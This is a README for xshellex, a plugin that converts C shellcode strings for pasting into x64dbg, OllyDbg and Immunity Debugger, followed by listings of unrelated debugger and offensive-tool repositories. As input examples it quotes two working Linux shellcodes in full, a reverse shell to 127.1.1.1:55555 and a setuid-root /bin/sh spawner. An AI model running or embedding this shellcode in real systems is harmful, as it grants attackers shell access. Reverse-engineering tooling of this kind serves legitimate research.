With xshellex you can paste any kind of c-shellcode strings in x64dbg, ollydbg & immunity debugger

Overview

xshellex

WARNING: the ugliest code in the world

With xshellex you can paste any kind of c-shellcode strings in x64dbg, ollydbg & immunity debugger. Also you can convert the "binary-copied-clipboard" to c-shellcode string.

This plugin uses shellex, my handy "C-shellcode to hex converter" tool for paste & execute shellcodes in gdb, windbg, radare2, ollydbg, 010 editor etc.

Install

Just download https://github.com/David-Reguera-Garcia-Dreg/xshellex/releases/download/r0.1b/xshellex01b.zip

Extract the .zip

x64dbg

Copy the release folder in the x64dbg folder.

Now check if you have installed:

  • x64dbg\release\tcc
  • x64dbg\release\shellex.exe
  • x64dbg\release\x32\plugins\xshellex.dp32
  • x64dbg\release\x64\plugins\xshellex.dp64

ollydbg

Copy the ollydbg folder content to ollydbg path (I use C:\odbg110)

Now check if you have installed:

  • C:\odbg110\tcc
  • C:\odbg110\shellex.exe
  • C:\odbg110\shellex.dll

immunity debugger

Copy the immunity folder content to C:\Program Files (x86)\Immunity Inc\Immunity Debugger

Now check if you have installed:

  • C:\Program Files (x86)\Immunity Inc\Immunity Debugger\tcc
  • C:\Program Files (x86)\Immunity Inc\Immunity Debugger\shellex.exe
  • C:\Program Files (x86)\Immunity Inc\Immunity Debugger\shellex.dll

Use

Go to Plugins --> xshellex --> launch

Paste your c-shellcode string

Press enter

Press Control+Z

Copy the output to clipboard

Alt text

Use x64dbg Binary Paste (right click in disasm)

Alt text

WARNING: In x64dbg you can use Paste ignore size BUT in ollydbg & immunity debugger you must select first a long area:

Alt text

Alt text

Converting binary-copied-clipboard to c-shellcode string

Select area

Right click --> Binary ---> Copy

Alt text

Go to Plugins --> xshellex --> clipboard to ....

Alt text

Why this plugin?

In real world yummyPaste plugin ( https://github.com/0ffffffffh/yummyPaste ) cant works fine, because you have a lot of garbage to filter, just check shellcodes like

http://shell-storm.org/shellcode/files/shellcode-833.php

unsigned char code[] = \

"\x68"
"\x7f\x01\x01\x01"  // <- IP Number "127.1.1.1"
"\x5e\x66\x68"
"\xd9\x03"          // <- Port Number "55555"
"\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02"
"\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79"
"\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a"
"\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\xeb\xce";

https://www.exploit-db.com/exploits/13359

char sc[] = /* 7 + 23 = 30 bytes */
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80";

Compilation

Visual Studio 2013

WARNING: To convert ollydbg plugin to immunity debugger plugin just use auxtools\PluginFix

Owner
David Reguera Garcia aka Dreg
Senior Malware Researcher, ASM, C, C++, x86_64, Research & Development.
David Reguera Garcia aka Dreg
A plugin for x64dbg.

x128dbg x128dbg 是一个 x64dbg 的插件,随着时间的推移,它会有越来越多的功能 目前的 x128dbg 的版本为 v1 ,它提供了查看汇编指令手册的功能 查看汇编指令手册 有时,我们在使用 x64dbg 调试时,会碰到不认识的汇编指令(即使开启了 x64dbg 自带的 Ctrl+

古月浪子 20 Apr 26, 2022
Hypervisor based anti anti debug plugin for x64dbg

HyperHide Table of Contents Description Compilation Support Usage Information Examples Features 1. Process Environment Block (PEB) 2. Heap Flags 3. Pr

Air 528 Jun 26, 2022
DotX64Dbg aims to provide a seamless way to write and test plugins for X64Dbg using .Net 5.0 and C#.

DotX64Dbg (EARLY ALPHA) Plugins and Scripting with C# for x64Dbg. Create Plugins for X64Dbg with ease DotX64Dbg aims to provide a seamless way to writ

ζeh Matt 7 Jan 21, 2022
x64Dbg plugin that enables C# plugins with hot-loading support and scripting.

DotX64Dbg (EARLY ALPHA) Plugins and Scripting with C# for x64Dbg. Create Plugins for X64Dbg with ease DotX64Dbg aims to provide a seamless way to writ

x64dbg 82 Jun 7, 2022
Palanteer is a set of high performance visual profiler, debugger, tests enabler for C++ and Python

Palanteer is a set of lean and efficient tools to improve the general software quality, for C++ and Python programs.

Damien Feneyrou 1.9k Jul 3, 2022
A Garry's Mod module that creates a Remote DeBugger server

gm_rdb A Garry's Mod module that creates a Remote DeBugger server. Provides Lua debugging (using LRDB) and access to the Source engine console. Compil

Daniel 12 Jan 13, 2022
The world's first free and open-source PlayStation 3 emulator/debugger, written in C++ for Windows and Linux.

The world's first free and open-source PlayStation 3 emulator/debugger, written in C++ for Windows and Linux.

null 11.4k Jul 3, 2022
heaptrace is a ptrace-based debugger for tracking glibc heap operations in ELF64 (x86_64) binaries

heaptrace is a ptrace-based debugger for tracking glibc heap operations in ELF64 (x86_64) binaries. Its purpose is to help visualize heap operations when debugging binaries or doing heap pwn.

Aaron Esau 233 Jun 15, 2022
Templight 2.0 - Template Instantiation Profiler and Debugger

Templight is a Clang-based tool to profile the time and memory consumption of template instantiations and to perform interactive debugging sessions to gain introspection into the template instantiation process.

Sven Mikael Persson 585 Jun 18, 2022
A small, educational debugger with no dependencies

smldbg A small, educational debugger with no dependencies. Prerequisites To build the project and run the tests, the following are required: A C++20 c

null 3 Jun 16, 2022
C-shellcode to hex converter, handy tool for paste & execute shellcodes in gdb, windbg, radare2, ollydbg, x64dbg, immunity debugger & 010 editor

shellex WARNING: the ugliest code in the world C-shellcode to hex converter. Handy tool for paste & execute shellcodes in gdb, windbg, radare2, ollydb

David Reguera Garcia aka Dreg 79 Jun 20, 2022
Create a calculator of any kind in any language, create a pr.

calculators Create a calculator of any kind in any language, create a pr. Create a calculator of any type using the programming language of your choic

Akshay Gautam 2 Dec 1, 2021
Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.

Cobalt Strike "Where Am I?" Beacon Object File Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environmen

Bobby Cooke 86 Jun 15, 2022
Chad Strings - The Chad way to handle strings in C.

chadstr.h Chad Strings - The Chad way to handle strings in C. One str(...) macro to handle them all. Examples Usage: int table = 13; int id = 37; str

null 776 Jun 26, 2022
About Add any Program in any language you like or add a hello world Program ❣️ if you like give us ⭐

Hello-World About Add any Program in any language you like or add a hello world Program ❣️ if you like give us ⭐ Give this Project a Star ⭐ If you lik

Lokesh Jangid 16 Jan 22, 2022
An embedded CAN bus sniffer which is able to monitor any of the vehicle internal CAN bus and perform some action by triggering new CAN messages.

An embedded CAN bus sniffer which is able to monitor any of the vehicle internal CAN bus and perform some action by triggering new CAN messages. In this way certain vehicle functionality can be triggered by responding to custom steering wheel button events, or use the vehicle virtual cockpit to display OBD-PIDs values instead of relying on an external display to present new information to the user

null 13 May 21, 2022
HyperDbg debugger is an open-source, hypervisor-assisted user-mode, and kernel-mode Windows debugger 🐞

HyperDbg debugger is an open-source, hypervisor-assisted user-mode, and kernel-mode Windows debugger with a focus on using modern hardware technologies. It is a debugger designed for analyzing, fuzzing and reversing. ??

HyperDbg 1.7k Jun 24, 2022
RV-Debugger-BL702 is an opensource project that implement a JTAG+UART debugger with BL702C-A0.

BL702 is highly integrated BLE and Zigbee combo chipset for IoT applications, contains 32-bit RISC-V CPU with FPU, frequency up to 144MHz, with 132KB RAM and 192 KB ROM, 1Kb eFuse, 512KB embedded Flash, USB2.0 FS device interface, and many other features.

Sipeed 73 Jun 21, 2022
Some hypervisor research notes. There is also a useful exploit template that you can use to verify / falsify any assumptions you may make while auditing code, and for exploit development.

Introduction Over the past few weeks, I've been doing some hypervisor research here and there, with most of my focus being on PCI device emulation cod

Faith 122 Jun 20, 2022
runsc loads 32/64 bit shellcode (depending on how runsc is compiled) in a way that makes it easy to load in a debugger. This code is based on the code from https://github.com/Kdr0x/Kd_Shellcode_Loader by Gary "kd" Contreras.

runsc This code is based on the code from https://github.com/Kdr0x/Kd_Shellcode_Loader by Gary "kd" Contreras and contains additional functionality. T

null 23 Jun 15, 2022
This is a imgui login that runs with keyauth with only uses the key and has tabs for you to paste your stuff in c++

KeyAuth-Imgui-key-Login This is a imgui login that runs with keyauth with only uses the key and has tabs for you to paste your stuff in c++ KeyAuth CP

Lucent 9 Jun 21, 2022
Had a tough time playing Microsoft Wordament ? Well WORDament_Solver has your back. It suggests you meaningful words you can use while playing the game and help you top the leaderboard.

WORDament_Solver Had a tough time playing Microsoft Wordament ? Well WORDament_Solver has your back. It suggests you meaningful words you can use whil

Tushar Agarwal 3 Aug 19, 2021
This project is pretty straightforward, you have to recode printf. You will learn what is and how to implement variadic functions. Once you validate it, you will reuse this function in your future projects.

100/100 Introduction to ft_printf This is the third project in the 1337 Curriculum #42network . This project is pretty straight forward, recode the pr

Zakaria Yacoubi 4 May 27, 2022
EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state, inject shellcode, hijack main thread with APC, and execute shellcode

HOLLOW - Cobalt Strike BOF Authors: Bobby Cooke (@0xBoku) Justin Hamilton (@JTHam0) Octavio Paguaga (@OakTree__) Matt Kingstone (@n00bRage) Beacon Obj

Bobby Cooke 188 Jun 27, 2022
deserter is the first of its kind targeted DNS cache poisoner

deserter is the first of its kind targeted DNS cache poisoner. It is capable of DNS cache poisoning without bruteforcing the target ID and source port - instead, it sniffs out DNS probes and uses the information inside to craft poisoned responses and send them back to the target.

null 74 Jul 1, 2022
dos-like is a programming library/framework, kind of like a tiny game engin

dos-like is a programming library/framework, kind of like a tiny game engine, for writing games and programs with a similar feel to MS-DOS productions from the early 90s. But rather than writing code that would run on a real DOS machine, dos-like is about making programs which runs on modern platforms like Windows, Mac and Linux, but which attempts to recreate the look, feel, and sound of old DOS programs.

Mattias Gustavsson 761 Jul 3, 2022
This is a repository entirely dedicated to all kind of questions ranging from basic DSA to CP. It aims to provide a solution to different questions. 📚

?? CP-DSA-Questions ?? This is a repository entirely dedicated to all kind of questions ranging from basic DSA to CP. It aims to provide a solution to

Kanak 70 May 15, 2022
Loads a signed kernel driver which allows you to map any driver to kernel mode without any traces of the signed / mapped driver.

CosMapper Loads a signed kernel driver (signed with leaked cert) which allows you to map any driver to kernel mode without any traces of the signed /

null 107 Jul 2, 2022
x64dbg plugin for simple spoofing of CPUID instruction behavior

CPUID Spoofer CpuidSpoofer is a x64dbg plugin which helps you to modify the behaviour of the CPUID instruction. For example, you can easily change the

null 48 Jun 11, 2022